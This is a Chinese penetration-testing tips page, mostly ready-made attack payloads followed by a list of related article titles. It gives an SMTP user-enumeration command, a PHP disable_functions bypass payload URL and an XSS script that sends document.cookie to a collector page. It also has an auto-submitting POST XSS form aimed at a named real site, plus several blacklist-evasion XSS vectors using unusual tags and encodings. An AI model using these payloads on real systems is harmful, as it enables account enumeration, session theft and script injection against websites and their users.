滲透特殊技巧一
①郵箱列舉
smtp-user-enum -M VRFY -U /root/Desktop/user.txt -t 192.168.1.107
-M: Method模式,選擇VRFY, EXPN以及RCPT方法猜解使用者名稱
-U: 使用者名稱字典檔案
-t: 執行smtp服務的主機
②繞shell時遇到函式禁用
工具
https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD
構造執行命令
**Payload:http://xxx/dp1.php?cmd=whoami&outpath=/tmp/xx&sopath=/xxx/dp1.so**
③xss獲取cookie值
利用重定向的方法獲取
<script>document.location = 'http://127.0.0.1/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>
④xss特殊玩法
post xss玩法
原始碼
<html>
<body>
<form name="form" id="form1" method="post" action="http://www.ncufz.net/gkcx/searchzj.asp">
<input type="text" name="keywords" hidden="true" value='test"><sCRiPt sRC=></sCrIpT>'/>
</form>
<script>
document.getElementById('form1').submit();
</script>
</body>
</html>
注意在name地方處改這個頁面提交屬性的值
在action處提交到的頁面
在value處更改內容
不常見標籤
<style onload=alert(1) />
#典型發表留言處,姓名可利用這個繞
<body onpageshow=alert(1)>
#利用body標籤進行繞
<marquee behavior="alternate" onstart=alert(1)>hack the planet</marquee><marquee loop="1" onfinish=alert(1)>hack the planet</marquee><marquee onstart=alert(1)>hack the planet</marquee>
#Marquee 標籤
繞黑名單程式碼樣式
原因:JavaScript程式碼同義的各種動作都會被目標防護軟體列入黑名單,甚至是使用正常的alert也不例外
繞方法
如果編碼被過濾了
用 \u003c 來代替<
<類符號被過濾了 可以轉實體編碼進行繞
\u003e換成原來的>
<img src=1 onerr\or=alert(1)>
常見的編碼繞
①實體編碼
②hex編碼
③base64編碼
④utf-8編碼
相關文章
- 域內滲透基本技巧
- 滲透測試的WINDOWS NTFS技巧集合(一)Windows
- 滲透測試技巧總結
- linux滲透測試技巧2則Linux
- 第六章-實用滲透技巧-1:針對雲環境的滲透
- 滲透測試的WINDOWS NTFS技巧集合(二)Windows
- 滲透測試工具實戰技巧合集
- 滲透技巧——透過cmd上傳檔案的N種方法
- 內網滲透應用 跨vlan滲透的一種思路內網
- 內網滲透-初探域滲透內網
- 滲透技巧——如何巧妙利用PSR監控Windows桌面Windows
- wifi滲透WiFi
- 網站滲透測試漏掃工具的應用技巧網站
- 域滲透之利用WMI來橫向滲透
- 記一次實戰滲透
- metasploit滲透測試筆記(內網滲透篇)筆記內網
- 滲透測試會用到哪些工具?滲透測試教程
- Me-and-My-Girlfriend-1靶機滲透 (Vulnhub內網滲透)內網
- 網站滲透思路網站
- pentestdb滲透工具使用
- Linux滲透測試Linux
- TPLINK滲透實戰
- 域滲透——Skeleton Key
- 域滲透——Hook PasswordChangeNotifyHook
- 域滲透——Pass The Ticket
- 內網滲透工具內網
- 伺服器滲透?伺服器
- Linux內網滲透Linux內網
- 記一次授權滲透測試
- 什麼是滲透測試?為什麼要做滲透測試?
- 什麼是滲透測試?滲透測試分類方式有哪些?
- 什麼是內網滲透和外網滲透?有何區別?內網
- 什麼是滲透測試?滲透測試分為哪幾類?
- 滲透測試怎麼做?滲透測試的步驟有哪些?
- 你真的瞭解“滲透測試”嗎?滲透測試有何作用?
- 10、一篇經典的域滲透文章
- 記一次難忘的滲透測試
- 記一次某edu單位的滲透